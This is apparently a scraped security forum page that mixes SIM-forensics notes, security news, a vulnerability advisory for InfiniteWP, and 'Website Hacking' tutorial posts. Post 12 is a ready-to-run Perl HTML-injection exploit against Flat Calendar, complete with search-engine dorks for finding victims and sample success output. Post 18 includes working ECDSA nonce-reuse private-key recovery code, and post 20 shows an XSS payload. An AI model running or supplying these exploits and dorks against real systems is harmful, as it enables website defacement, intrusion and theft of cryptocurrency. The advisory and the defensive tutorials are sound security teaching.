refers to the telecommunications industry. -The next two or three digits refer to the mobile country code (MCC) as defined by ITU-T recommendation E.164. “310? refers to the United States. -The next one to four digits refer to the mobile network code (MNC). This is a fixed number for a country or world zone. “410? refers to the operator, AT&T Mobility. -The next two digits, “10,” pertain to the home location register. Individual account information is variable in length: -The next nine digits, “654378930,” represent the individual account identification number. Every number under one IIN has the same number of digits. Check digit—the last digit, “1,” is computed from the other 18 digits using the Luhn algorithm. IMSI: The international mobile subscriber identity is a unique 15-digit number provided to the subscriber. It has a similar structure to ICCID and consists of the MCC, MNC, and MSIN. An example of interpreting a hypothetical 15-digit IMSI (302 720 123456789) is shown below: MCC—The first three digits identify the country. “302? refers to Canada. MNC—The next two (European Standard) or three digits (North American Standard) identify the operator. “720? refers to Rogers Communications. MSIN—The next nine digits, “123456789,” identify the mobile unit within a carrier’s GSM network MSISDN—The Mobile Station International Subscriber Directory Number is intended to convey the telephone number assigned to the subscriber for receiving calls on the phone. An example of the MSISDN format is shown below: CC can be up to 3 digits. NDC usually 2 or 3 digits. SN can be up to a maximum 10 digits B. Phonebook and Call Information 1. Abbreviated dialing numbers (ADN)—Any number and name dialed by the subscriber is saved by the ADN EF. The type of number and numbering plan identification is also maintained under this. This function works on the subscriber’s commonly dialed numbers. The ADN cannot be changed by the service provider and they can be attributed to the user of the phone. Most SIMs provide 100 slots for ADN entries. 2. Fixed dialing numbers (FDN)—The FDN EF works similar to the ADN because it involves contact numbers and names. With this function, The user doesn’t have to dial numbers; by pressing any number pad of the phone, he can access to the contact number. 3. Last number dialed (LND)—The LND EF contains the number most recently dialed by the subscriber . The number and name associated with that number is stored in this entry. Depending upon the phone, it is also conceivable that the information may be stored in the handset and not on the SIM. Any numbers that may be present can provide valuable information to an investigator. XML Phonebook Entry C. Messaging Information—Messaging is a communication medium by which text is entered on one cell phone and delivered via the mobile phone network. The short message service contains texts and associated parameters for the message. SMS entries contain other information besides the text itself, such as the time an incoming message was sent, as recorded by the mobile phone network, the sender’s phone number, the SMS center address, and the status of the entry. An SMS is limited to either 160 characters (Latin alphabet) or 70 characters (for other alphabets). Longer messages are broken down by the sending phone and reassembled by the receiving phone. Tools for SIM Forensics To perform forensic investigation on a SIM card ,it has to be removed from the cell phone and connect to a SIM card reader. 
The original data on the SIM card is preserved by eliminating write requests to the SIM during its analysis. We then calculate the hash value of the data; hashing is used for checking the integrity of the data, that is, whether it has changed or not. There are lots of forensic tools available, but not all of them are able to extract data from every type of cell phone and SIM card. Below are some of the best-known tools:
EnCase Smartphone Examiner: This tool is specifically designed for gathering data from smartphones and tablets such as the iPhone and iPad. It can capture evidence from devices that use Apple iOS, HP Palm OS, Windows Mobile OS, Google Android OS, or RIM BlackBerry OS. It can acquire data from BlackBerry and iTunes backup files as well as a multitude of SD cards. The evidence can be seamlessly integrated into EnCase Forensic.
MOBILedit! Forensic: This tool can analyze phones via Bluetooth, IrDA, or cable connection; it analyzes SIMs through SIM readers and can read deleted messages from the SIM card.
pySIM: A SIM card management tool capable of creating, editing, deleting, and performing backup and restore operations on the SIM phonebook and SMS records.
AccessData Mobile Phone Examiner (MPE) Plus: This tool supports more than 7,000 phones, including iOS, Android, BlackBerry, Windows Mobile, and Chinese devices, and can be purchased as hardware with a SIM card reader and data cables. File systems are immediately viewable and can be parsed in MPE+ to locate the lock code, EXIF data, and any other data contained in the mobile phone's file system.
SIMpull: SIMpull is a powerful SIM card acquisition application that allows you to acquire the entire contents of a SIM card. This includes the retrieval of deleted SMS messages, a feature not available in many other commercial SIM card acquisition programs. SIMpull first determines whether the card is a GSM SIM or a 3G USIM, then performs a logical acquisition of all files defined in the ETSI TS 151.011 (GSM) or ETSI TS 131.102 (USIM) standards. As can be seen in the above figure, using the SIMpull application we can view SMS information such as the SMS text and its length, the sender's number, service center information, etc.
References
SIM Forensics: Part 1
SIM Forensics: Part 2
SIM Forensics: Part 3
https://www.visualanalysis.com/ProductsVA_SIMpull.aspx
http://csrc.nist.gov/groups/SNS/mobile_security/documents/mobile_forensics/Reference%20Mat-final-a.pdf
Source
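As noted earlier, the last ICCID digit is a Luhn check digit, so an examiner can quickly sanity-check an ICCID recovered from a SIM image. Below is a minimal PHP sketch of that check; the sample number is the hypothetical ICCID used earlier in the article, so it is not guaranteed to pass.

<?php
// Luhn (mod 10) validation, as used for the ICCID check digit.
function luhnValid($digits) {
    $digits = preg_replace('/\D/', '', $digits);   // keep digits only
    $sum = 0;
    $double = false;                               // the rightmost (check) digit is not doubled
    for ($i = strlen($digits) - 1; $i >= 0; $i--) {
        $d = (int)$digits[$i];
        if ($double) {
            $d *= 2;
            if ($d > 9) {
                $d -= 9;
            }
        }
        $sum += $d;
        $double = !$double;
    }
    return $sum % 10 === 0;
}

// Hypothetical ICCID from the article; a made-up example may fail the check.
$iccid = '89310410106543789301';
echo $iccid, ' -> ', luhnValid($iccid) ? 'check digit OK' : 'check digit invalid', "\n";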
  12. #!/usr/bin/perl -w
#Title   : Flat Calendar v1.1 HTML Injection Exploit
#Download: http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author  : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test    : Windows7 Ultimate
#Date    : 08/12/2014
#Thks    : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali )
#Dork1   : intext:"Flat Calendar is powered by Flat File DB"
#Dork2   : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://server / index.html ZoRLu
#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://server
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709

use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;

# Print usage instructions after clearing the screen.
sub hlp() {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
    print "Exam1: perl $0 http://server / index.html ZoRLu\n";
    print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
}

if (@ARGV != 4) {
    hlp();
    exit();
}

my $ua    = LWP::UserAgent->new;
my $url   = $ARGV[0];
my $path  = $ARGV[1];
my $index = $ARGV[2];
my $nick  = $ARGV[3];
my $vuln  = $url . $path . "admin/calAdd.php";

print "\n[+] Target: " . $url . "\n";
print "[+] Path: " . $path . "\n";
print "[+] index: " . $index . "\n";
print "[+] Nick: " . $nick . "\n";

# Month names used to build the calendar POST body.
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3, 4, 5];
my $year = 1900 + $yearset;
my $moon = $months[$month];

if (open(my $fh, $index)) {
    while (my $row = <$fh>) {
        chomp $row;
        # Each line of the local index file is injected as the event description.
        my $req = POST $vuln, [
            event       => 'Test Page',
            description => $row,
            month       => $moon,
            day         => $day,
            year        => $year,
            submitted   => $nick,
        ];
        my $resp = $ua->request($req);
        if ($resp->is_success) {
            my $message = $resp->decoded_content;
            my $regex   = "Record Added: taking you back";
            if ($message =~ /$regex/) {
                print "[+] Exploit Succes\n";
                my $newua  = LWP::UserAgent->new();
                my $newurl = $url . $path . "calendar.php";
                my $newreq = $newua->get($newurl);
                if ($newreq->is_success) {
                    my $newmessage = $newreq->decoded_content;
                    my $first = rindex($newmessage, "viewEvent.php?eventNumber=");
                    print "[+] Searching url...\n";
                    my $request = substr($newmessage, $first + 26, 4);
                    print "[+] YourEventNumber = $request\n";
                    sleep(1);
                    print "[+] " . $url . $path . "viewEvent.php?eventNumber=" . $request . "\n";
                } else {
                    print "[-] HTTP POST error code: ", $newreq->code, "\n";
                    print "[-] HTTP POST error message: ", $newreq->message, "\n";
                }
            } else {
                print "[-] Exploit Failed\n";
            }
        } else {
            print "[-] HTTP POST error code: ", $resp->code, "\n";
            print "[-] HTTP POST error message: ", $resp->message, "\n";
        }
    }
} else {
    sleep(1);
    die("[-] NotFound: $index\n");
}
Source
  13. Hackers have leaked documents alleging to be the terms of Sony's licensing agreement with Netflix. The hackers sent the information to V3 using various compromised email addresses as a part of a wider data dump. The messages included a basic 'We have released the data here' text and link to data reserves stored on various free upload sites. Sony and Netflix had not responded to V3's request for comment on the alleged leaks at the time of publishing. The Netflix files were stored on shorttext.com, and F-Secure security analyst Sean Sullivan, who aided V3's investigation, said that the files "seem" to have been based in Virginia and hosted on Amazon's cloud. The file had been deleted at the time of publishing. Prior to the Netflix message the hackers sent V3 links to various other alleged leaks, which claim to be information on over 3,000 contacts, including celebrities, stolen from Sony Pictures Entertainment. The leaks are the latest in a stream of security woes for Sony. The security crisis began in November when a group operating under the #GOP hashtag attempted to blackmail the firm. "We've obtained all your internal data, including your secrets and top secrets. If you don't obey us, we'll release data shown below to the world," the group said in a message posted on the site. The reason for the attack remains unknown, although industry rumblings suggest that the motivation is political and aims to stop Sony releasing controversial comedy The Interview. The source of the attack is also shrouded in mystery, but North Korea has refused to confirm that it is not behind the campaign. The attack has led to a fresh backlash against Sony for its lax security practices. Reports suggest that the hackers managed to access so many of the firm's systems as Sony stored passwords in an unprotected file labelled 'passwords'. The hack is reportedly being investigated by the FBI. Sony is rumoured to have hired advanced threat specialists at security firm Mandiant to help with the investigation. Sony is one of several big name companies to suffer data breaches this year. JPMorgan revealed in October that a cyber strike on its systems successfully compromised data belonging to 76 million households and seven million small to medium sized businesses. The chief executive of US retail giant Target, Gregg Steinhafel, stepped down in the wake of a data breach in May. Source
  14. Multiple vulnerabilities in InfiniteWP Admin Panel https://lifeforms.nl/20141210/infinitewp-vulnerabilities/ ----- InfiniteWP (http://www.infinitewp.com/) allows an administrator to manage multiple Wordpress sites from one control panel. According to the InfiniteWP homepage, it is used on over 317,000 Wordpress sites. The InfiniteWP Admin Panel contains a number of vulnerabilities that can be exploited by an unauthenticated remote attacker. These vulnerabilities allow taking over managed Wordpress sites by leaking secret InfiniteWP client keys, allow SQL injection, allow cracking of InfiniteWP admin passwords, and in some cases allow PHP code injection. It is strongly recommended that InfiniteWP users upgrade to InfiniteWP Admin Panel 2.4.4, and apply the recommendations at the end of this post. ----- Issue 1: login.php unauthenticated SQL injection vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.2 User-controlled parameter email appears in a SQL query modified by function filterParameters() which ostensibly "filters" its arguments, but escaping is not being performed, because the parameter $DBEscapeString is set to false by default. This allows for SQL injection. ----- Issue 2: execute.php unauthenticated SQL injection vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.3 User-controlled parameter historyID appears without quotes in a SQL query. Additionally, user-controlled parameters historyID and actionID should be escaped by function filterParameters(), but escaping is not being performed, because $DBEscapeString is set to false by default. This allows for SQL injection. ----- Issue 3: uploadScript.php unrestricted file upload vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.3 Unauthenticated users can upload various file types to the uploads directory, including .php files, if query parameter allWPFiles is set. File names however are suffixed with the .swp extension when written to the file system. If the following two conditions hold, this leads to PHP injection: 1. The uploads directory must be writable by the webserver. 2. The webserver must interpret *.php.swp files as PHP code, which happens when Apache is used with configuration 'AddHandler application/x-httpd-php .php' or 'AddType application/x-httpd-php .php' (This is discouraged by PHP, but older distributions and some shared hosts use it) ----- Issue 4: Insecure password storage Vulnerable: All versions including current (2.4.4) Passwords are stored as unsalted SHA1 hashes in iwp_users.password. These passwords can easily be cracked. Cracking a password allows a successful attacker to keep their access to the admin panel even after security updates are applied. ----- Recommendations We recommend that users of InfiniteWP take the following actions: 1. Upgrade InfiniteWP Admin Panel to version 2.4.4. 2. Check the uploads directory for the presence of any unauthorized file uploads. 3. Change admin passwords for the InfiniteWP Admin Panel and any Wordpress sites in the panel. Use long and unique passwords. 4. Remove and re-add Wordpress sites to the InfiniteWP Admin Panel, in order to generate new secret keys. 5. Strongly consider limiting access to the InfiniteWP Admin Panel, especially if you do not require customer access to the panel. For instance, use a .htaccess file to add authentication and limit IP addresses. If possible, protect the panel with a web application firewall (WAF) such as ModSecurity. 
----- Timeline - 26 Nov: Vulnerabilities and patches submitted to InfiniteWP - 27 Nov: InfiniteWP publishes version 2.4.3 with fix for issue 1 - 4 Dec: Incomplete fix reported to InfiniteWP - 9 Dec: InfiniteWP publishes version 2.4.4 with fix for issues 2-3 - 10 Dec: Vulnerabilities published ----- Credits The vulnerabilities were found by Walter Hop, Slik BV (http://www.slik.eu/), The Netherlands. -- Walter Hop | PGP key: https://lifeforms.nl/pgp Source
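To see why issue 4 from the advisory above matters, here is a small PHP sketch contrasting unsalted SHA1 with PHP's built-in password hashing. The "stolen" hash and the wordlist are invented for the example; the point is that unsalted, fast hashes fall to cheap dictionary attacks, while password_hash() adds a per-user salt and a deliberately slow algorithm.

<?php
// Illustration only: why unsalted SHA1 password storage (InfiniteWP issue 4) is weak.
// The "stolen" hash and wordlist below are made up for the example.
$stolenHash = sha1('letmein123');          // what an attacker would find in iwp_users.password
$wordlist   = ['password', 'admin2014', 'letmein123', 'qwerty'];

foreach ($wordlist as $guess) {
    if (sha1($guess) === $stolenHash) {    // one cheap hash per guess, no salt to slow it down
        echo "Cracked: $guess\n";
        break;
    }
}

// The safer pattern: salted, slow, per-user hashes.
$stored = password_hash('letmein123', PASSWORD_DEFAULT);             // bcrypt by default, random salt
var_dump(password_verify('letmein123', $stored));                    // bool(true)
var_dump(password_hash('letmein123', PASSWORD_DEFAULT) === $stored); // bool(false): salts differ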
  15. Whatever Dorel lays his hands on turns to dust. God, how can those guys be so stupid?
  16. http://www.digi24.ro/embed/Stiri/Digi24/Extern/Stiri/Tortura+CIA+dezvaluita+in+Senatul+american?video Right now, a 500-page document describing the CIA's interrogation techniques is being presented in the US Senate. Senators accuse the agents of having used extremely brutal and often ineffective methods on terrorism suspects. It violates the values that America promotes, Barack Obama concluded. Moreover, the interrogation program was not supervised by Congress, as it should have been, and CIA agents provided false or truncated information to Congress and the White House about the intensity and brutality of the interrogation techniques used. The senators say the Agency did not report the true number of prisoners subjected to brutal interrogations. All this while at least 26 of the detainees subjected to these interrogations should never have been in detention in the first place. Finally, the report drawn up by the Democratic senators accuses the CIA of having illegally leaked information from its files to certain journalists, in order to create the impression that interrogations such as those at Guantanamo were successful and that the American counterintelligence services had obtained essential information in the fight against terrorism. Source
  17. Guys, maybe the man simply doesn't know; let's not turn this into trolling... @Stefanae eBay is a reputable site and yes, I recommend it; I've bought various products there over time and I'm satisfied. It also depends on the product, though: you might find the same product, in identical condition, on Romanian sites at a price equal to or lower than on eBay.
  18. A white-hat hacker who was able to take 255 BTC from Blockchain wallets following a security flaw earlier this week claims to have returned the funds. Bitcoin Talk member 'johoe', an account 1.5 years old but with only 21 posts, had always stated that he or she was taking the funds for safekeeping and would return them, writing on the forum: Johoe then posted a page of 1,019 addresses said to be compromised, and invited users to check if theirs was one of them. Even before the funds were returned, Blockchain had admitted it was at fault and promised to reimburse any users who had lost money. Random number flaw The problem that led to the vulnerability was reportedly wallets generated with previously used 'R-values' in formulas that generate random numbers, meaning a hacker could use the public address to calculate its private keys. If R-values are unique, this should be impossible. For the technically-inclined, Blockchain CTO Ben Reeves has pointed out the mistake in code on Blockchain's GitHub page here. Blockchain posted in a statement that the issue affected web wallet users who had created a new wallet address or sent funds from an existing address during the period the vulnerability was live. According to johoe, Reeves sent an email asking him to send the funds to this address, which johoe duly did, posting a photo of a Trezor wallet sending the transaction. Still solving the problem Customers on Bitcoin Talk and Reddit, while relieved their funds were swept by someone with good intentions, are now attempting to contact Blockchain to prove their losses and have them returned. At this stage, however, it is not 100% confirmed that all funds removed from Blockchain wallets were under johoe's control. At least one user has claimed that nearly 100 BTC missing from his wallet have gone elsewhere. CoinDesk reached out to both johoe and Blockchain for comment but had not received a response at press time. Source
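For readers wondering why a repeated R-value is fatal, the algebra is short enough to sketch. The PHP/GMP snippet below simulates two ECDSA signatures made with the same nonce k (and therefore the same r) and then recovers both the nonce and the private key from the signature values alone. All numbers are toy values and r is only a placeholder (on a real curve it would be derived from k*G); this is the textbook nonce-reuse attack, not Blockchain's actual code.

<?php
// Why a reused ECDSA nonce (a repeated "R-value") leaks the private key.
// Toy values throughout: d, k, r and the message hashes are made up.
$n  = gmp_init('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141', 16); // secp256k1 group order
$d  = gmp_init('1122334455667788', 16);   // "private key"
$k  = gmp_init('0DEADBEEFCAFE42', 16);    // nonce, wrongly reused for both signatures
$r  = gmp_init('0ABCDEF012345678', 16);   // stand-in for the shared R-value
$z1 = gmp_init('11111111', 16);           // hash of message 1
$z2 = gmp_init('22222222', 16);           // hash of message 2

// Signer: s = k^-1 * (z + r*d) mod n, with the same k (and r) both times -- the flaw.
$sign = fn($z) => gmp_mod(gmp_mul(gmp_invert($k, $n), gmp_add($z, gmp_mul($r, $d))), $n);
$s1 = $sign($z1);
$s2 = $sign($z2);

// Attacker: only (r, s1, z1) and (r, s2, z2) are needed.
// k = (z1 - z2) * (s1 - s2)^-1 mod n, then d = (s1*k - z1) * r^-1 mod n.
$kRec = gmp_mod(gmp_mul(gmp_mod(gmp_sub($z1, $z2), $n),
                        gmp_invert(gmp_mod(gmp_sub($s1, $s2), $n), $n)), $n);
$dRec = gmp_mod(gmp_mul(gmp_mod(gmp_sub(gmp_mul($s1, $kRec), $z1), $n),
                        gmp_invert($r, $n)), $n);

echo 'nonce recovered:       ', gmp_cmp($kRec, $k) === 0 ? 'yes' : 'no', "\n";
echo 'private key recovered: ', gmp_cmp($dRec, $d) === 0 ? 'yes' : 'no', "\n";

With unique nonces, s1 - s2 no longer cancels the unknowns and the recovery falls apart, which is why unique R-values make this "impossible" as the article puts it.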
  19. Chinese internet users are behind 85 per cent of fake websites, according to a semi-annual report [PDF] from the Anti-Phishing Working Group (APWG). Of the 22,679 malicious domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domain out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may because of the higher average price of new gTLDs, although they expect the new of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers. For much more information, check out the report itself [PDF]. Source
  20. Introduction In Part IV of the Website Hacking series, we are going to look at: Storing your email address and telephone number in <a href=mailto:*> and <a href=”tel:*> and the inherent drawbacks of these methods Shortcomings of disguising email in markup to avoid spam and other malicious requests (disguise such as mail [at] mail [dot] com) Pitfalls of CDNs (Content Delivery Networks) A widely used code snippet that is subject to XSS attacks Relying on the HTML markup for important data for the application (such as product prices) A loose security mechanism in an Australian governmental website. Avoid giving sensitive information in a plainly visible way in the HTML markup We all know of the <a href=mailto:sample@sample.com>Mail Me!</a>. However, giving out your email like this makes it pretty easy for bots to filter out your email and place it in a database/file, whatever they desire, making you subject to spam and other malicious attacks. To illustrate, I have created a sample script that gets all results for “mailto:” and <a href=”tel: xxx-xxx-xxxx”> from https://meanpath.com/ and stores it in a file or displays it to the browser. This script is just a sample and assumes that all results are on a single page. Furthermore, MeanPath shows only 100 rows from the results unless you pay to get all of them. Regular expressions are used to filter only those results that contain valid email addresses shown directly in the anchor tag. And for the telephone mining, it just gets the phones that are in the xxx-xxx-xxxx format. The code also ensures that no duplicate emails/telephones are entered into the list of the data. Figure 1: A view of some of the collected emails and telephone numbers. A better way to mine such data would be through Search Engine for Source Code - For HTML, JavaScript and CSS | NerdyData. Figure 2: First part of the code. It creates a MeanPath class with a function called mine_elements() which gets all results from MeanPath and stores it in an array. The other function filter_elements() filters only the elements that match the query that was given in the instantiation of the MeanPath object and also makes sure there are no duplicate entries. Figure 3: Second part of the code. The function display_data() shows the data in a ordered list in the browser. The function save_data_to_file() saves it on a random file, given when calling the function. Lastly, the MeanPath class is instantiated and data saved to a file and displayed in the browser. Thus, it should be evident by now that giving personal information should involve some safeguards. Of course, this is not always necessary. I also have to say that “encoding” the email in a format such as “sample [at] sample [dot] com” or “sample [at] sample . com” does not make it any more secure. Here we have a short snippet of code. There is an HTML paragraph with an email given in it in that format and a PHP code that gets the file and extracts the email with a silly regular expression that extracts it and saves it into an array. The regular expression checks for any number of characters followed by [at] or @, followed by any number of characters after which there are some of the top-level domains. 
Here is the browser result of the search: array(5) { [0]=> string(44) " Contact me at stereo [at] room [dot] com" [1]=> string(25) " Contact me at stereo " [2]=> string(4) "[at]" [3]=> string(12) " room [dot] " [4]=> string(3) "com" } matches[0] is the full expression that matched our search, matches[1] is the first parenthesized part of it that matched, and matches[2] is the second parenthesized part of the regex, and so on. Use CDNs but be aware of security implications CDNs (Content Delivery Networks) are a great way to decrease page load time (both because they often provide the script in numerous countries and load the one that’s closer to the user) and because users may have already cached the script by visiting another site which uses that particular CDN. However, there are security risks in that you have no control over what is stored in the loaded file. If the CDN gets compromised, the code in the file you are loading may change, and that can lead to more than just cookies being stolen. Also, the script loaded from the CDN can become unavailable, temporarily or not, leading to a frustrating user experience. If the file was on your domain and your site went down, the users would know there is a problem with the site, however if a CDN file such as jQuery gets unavailable and you are relying on it heavily – they would not know what is happening – the site would be up but it would look completely out of whack. First off, the attacker can change the source code of the delivered script, and: Replace your design with whatever he wants. Also, the attacker can execute JavaScript snippets if the user is using IE or Firefox (considering it is a .css file). Replace the code to frustrate users, redirect your site to another one, steal users’ cookies and load any kind of exploit code he wants. Gain server-side control if the delivered file is a JavaScript file. Figure 4: Executing arbitrary JavaScript within CSS Expression() works for some modes of IE8 and the ones below IE8 (particularly IE7 and IE5) which are still used nowadays. We see a very simple HTML 4.01 page which sets a cookie on each visit to the page without checking if it exists when the page loads. After that we have a <style> tag in which we pick a selector and a property and add expression(code here) to it where arbitrary JavaScript code can go inside. For example, you are loading a .css file via CDN (let’s say a CSS reset) this could be a potential security risk. Figure 5: Here is how the page looks in Internet Explorer 7.0 on Windows XP (Emulated from browserstack). As we can see, the expression ‘do’ gets evaluated and the cookie shown. We can do much more than this, but we will leave that to your imagination. Figure 6: The same page in a contemporary browser (latest version of Chrome) Another thing that can be done with control over the CSS is the following: Figure 8: Using a CSS CDN – possibilities Now, not only does a probable CDN have the ability to remove all of your content from being displayed to users, but it can add custom text to it, possibly acting as a fake redirect message and scaring/confusing your users enough to make them never come back to your site. Only two CSS selectors are necessary to make such a change to your page, and the code does not assume any level of knowledge of the HTML markup in the page: As for using CDNs for JavaScript files, I hope you do not think that it is only possible to steal the JavaScript cookies and mess around with the DOM when the external file is compromised. 
It takes 2-3 lines of code to load any server-side file via AJAX. To simulate a JavaScript file loaded from a CDN, we added a local .js file to the recipes page I’ve shown earlier. Then in the file we executed the following: And in the PHP script we had this: This worked as the picture below shows: Now the attacker has much more power over both the server and the website. You can see one of the previous articles of the series that concerned PHP Injection and learn some of the things that can be achieved from now on. XSS is everywhere Another thing to be on the lookout for is XSS. It comes in many forms, but here we will give one example that is sometimes unknown for developers. In PHP $_SERVER['PHP_SELF'] is vulnerable to cross-site scripting. Often, it is used as part of a <form> action attribute. It should always be escaped with something like <form method=”GET” action=”<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>”>. Figure 9: An example of a page vulnerable to XSS. Do not pay attention to the poor nesting. What the <form> action does is just echo the URL that the user is currently in. This means that he can easily manipulate the URL to include code and the browser will execute it. He can also give links with manipulated URLs of the site to third-users and get something from them. All he has to do is close the action attribute and close the <form> tag. Thus, he has to type “> and insert HTML code after that in the address bar. Figure 10: XSS example Above we see a JavaScript snippet executed in the address bar which alerts “Hi” (localhost:8079/4/php_self.php/”> <script> alert(“Hi”);</script>). Google Chrome would break requests like this, but Firefox does not do it that well. Setting important data for an application in the markup To illustrate, I have taken some screenshots from a search in nerdydata.com for the keyword data-price=” Setting important data for an application in the markup Figure 11: data-price=”$269.99?. It could be generated dynamically just to show the price with JavaScript. Figure 12: data-price”75? and a data-tid=”51127? (the ID of the product is also set in the HTML markup) Figure 13: close to 14,000 websites with price set in the HTML markup. At least a couple of them will be vulnerable to user manipulation of the price. I do not think that I am wrong by saying that at least a couple of sites from those 14,000 will not have proper mechanism set up on the server side to check for the product’s price by checking the product ID or name and getting the prices from a database. I also want to show this way of storing the price: Figure 14: <input type=”hidden” name=”price” value=”59?>, <input type=”hidden” name=”item_id” value=”…”> Figure 15: 7087 websites with hidden input containing the price of the product. Mo’ Captcha, Please Figure 16: Site of Australian government… In the picture we see a page from the site of the Australian Customs and Border Protection Service which does not have any of the fancy CAPTCHAs (I agree that they may prevent also legitimate users from using the site, but it is more positive than negative). The security mechanism in the abovementioned site seems static; the bold numbers do not change. In case they changed: I have created a snippet which fetches the numbers, considering they weren’t static, and this was their security verification method – showing and making you type different numbers in bold text next to other characters, all of which are fully visible in the HTML markup. 
Figure 17: This snippet fetches the page from their site and displays it in an unseen div so I can traverse the data with jQuery. The jQuery code then loops for each <strong> tag and adds its text to a variable, separating different strong tags by whitespace on both sides. Then a regex is called, which matches only numbers followed by whitespace on both sides and converts the resulting array to a string. Finally, all whitespace is removed from the mined numbers and their values are shown in the console and in an alert. Conclusion I hope those tips have helped you, whether a lot or a little, to see common mistakes and possibilities for mistakes in web applications. If you want to have all the source code, you can download all the files with PHP, HTML, CSS, JavaScript and JQuery code used in the article from this page. Source
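Following up on the data-price and hidden-input examples above: the server should treat anything coming back from the markup as nothing more than a lookup key and fetch the price itself. A minimal sketch of that pattern is below, using PDO with hypothetical table and column names.

<?php
// Never trust a price that round-trips through the client. Look it up server-side
// by product ID instead. Table and column names here are hypothetical.
$pdo = new PDO('mysql:host=localhost;dbname=shop;charset=utf8', 'user', 'pass');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$productId = (int)($_POST['item_id'] ?? 0);        // the only thing accepted from the form
$qty       = max(1, (int)($_POST['qty'] ?? 1));

$stmt = $pdo->prepare('SELECT product_price FROM Products WHERE product_id = ?');
$stmt->execute([$productId]);
$price = $stmt->fetchColumn();

if ($price === false) {
    http_response_code(400);
    exit('Unknown product.');
}

$total = $qty * (float)$price;                      // computed from the database, not from data-price
echo "Charging $total for product $productId";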
  21. Introduction In this part of the Website Hacking 101 series, we are going to discuss controlling access to directories (if access is not controlled by key directories like include/includes, the system can be accessed simply by guessing the URL), direct static injection (A Direct Static Code Injection attack consists of injecting code directly onto the resource used by application while processing a user request), file inclusion vulnerability (especially when dealing with files from external servers) and database security (quick guide). Exercise 9: Controlling Access It is always good practice to control access to your assets. There are directories and files that you do not want to be accessed by ordinary users. For instance, most apps have a system or include/includes directory. If the script in the includes directory is not written well enough to handle access outside the usual include statement, it might trigger some errors which would reveal information to possible attackers. For example, errors can reveal your hosting account which could lead to brute-force/dictionary attacks on your hosting account (that is just one simple example). Also, if a user opens a file with an extension .inc instead of .php – the code will not execute and will be printed as is. All files that do not contain server-side code or are not named properly will also be readily available for examination. Figure 1: Unprotected includes directory. All assets are revealed. The attacker can then test all the different assets for errors and start gathering information about additional vulnerabilities. Figure 2: Some of the includes do trigger errors As we mentioned before, a possible solution is to set display_errors to Off in the php.ini file or to use ini_set (‘display_errors’, ‘off’) in the code of a particular script. However, it is a better alternative to deny access to everyone but the server to this directory. In that way, your pages which include or require files from that directory can still access them but requests from a visitor (the client) would trigger an error. You simply create an .htaccess file in the forbidden-to-be directory and insert: order allow,deny allow from 127.0.0.1 deny from all where 127.0.0.1 can be used for localhost. You can also insert directly a domain name or your server’s IP address. There are myriad websites that show the IP address of the server, should you be in doubt about it. IMPORTANT: If you enable access to directories/files only from the server, you will be able to access them with functions such as include, require, fopen and file_get_contents, but users would not be able to access the files if the link was provided as an href attribute to an <a> tag or if the request for the file is made via an ajax call, since such requests also come from the client and not from the server itself. Thus, use this method only for directories/files that are not normally requested by the client. Alternatively, you can deny offending parties (such as spammers) access to your app by getting the $_SERVER['REMOTE_ADDR'], $_SERVER['HTTP_X_FORWARDED_FOR'] or $_SERVER['HTTP_CLIENT_IP'] (one of the last 2 values may be set if the client is using a proxy) array elements and writing the offending IP to the .htaccess file along with a ‘deny from’ directive. Exercise 10: Direct Static Injection (Your visits) Let’s say that we have an app that logs data about each visit of its users. The data can include the user’s IP, browser & OS and date and time of the visit. 
